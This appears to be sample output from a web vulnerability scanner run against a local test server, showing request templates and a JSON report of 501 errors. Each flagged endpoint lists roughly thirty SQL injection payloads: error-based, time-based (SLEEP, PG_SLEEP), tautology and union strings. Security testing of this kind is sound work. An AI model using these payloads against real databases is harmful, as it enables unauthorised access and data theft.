Requesting with these templates (all non-GET requests to SimpleHTTPServer return 501 status codes):
GET /derp HTTP/1.1
Accept: application/json
POST /test HTTP/1.1
Content-Type: application/json
Accept: application/json
{"test": 2}
POST /test HTTP/1.1
Content-Type: application/json
Accept: application/json
{"derp": 2}
PUT /test2 HTTP/1.1
Content-Type: application/json
Accept: application/json
{"derp": 2}
Yields this output:
{
"errors": [],
"failures": {
"localhost:9000/test": {
"500_errors": {
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities",
"payloads": [
{
"confidence": "High",
"param": {
"location": "data",
"method": "POST",
"type": "application/json",
"variables": [
"test",
"derp"
]
},
"strings": [
"AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))",
"AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)",
"AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
"AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)",
"PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)",
"(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))",
"(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
"AND (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND SLEEP(10)",
"RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND ELT(1=1,SLEEP(10))",
"AND 1=(SELECT 1 FROM PG_SLEEP(10))",
"(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
"(SELECT * FROM (SELECT(SLEEP(10)))x)",
"(SELECT 1 FROM PG_SLEEP(10))",
",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))",
"a'b\"c'd\"",
"' or 'a'='a",
"\" or \"a\"=\"a",
"') or ('a'='a",
"'/**/OR/**/1/**/=/**/1",
"' or 1=1 --",
"' union (select @@version) --",
"; OR '1'='1'"
]
}
],
"severity": "Low"
}
},
"localhost:9000/test2": {
"500_errors": {
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities",
"payloads": [
{
"confidence": "High",
"param": {
"location": "data",
"method": "PUT",
"type": "application/json",
"variables": [
"derp"
]
},
"strings": [
"AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))",
"AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)",
"AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
"AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)",
"PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)",
"(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))",
"(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
"AND (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND SLEEP(10)",
"RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND ELT(1=1,SLEEP(10))",
"AND 1=(SELECT 1 FROM PG_SLEEP(10))",
"(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
"(SELECT * FROM (SELECT(SLEEP(10)))x)",
"(SELECT 1 FROM PG_SLEEP(10))",
",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))",
"a'b\"c'd\"",
"' or 'a'='a",
"\" or \"a\"=\"a",
"') or ('a'='a",
"'/**/OR/**/1/**/=/**/1",
"' or 1=1 --",
"' union (select @@version) --",
"; OR '1'='1'"
]
}
],
"severity": "Low"
}
}
},
"stats": {
"High": 0,
"Low": 2,
"Medium": 0
}
}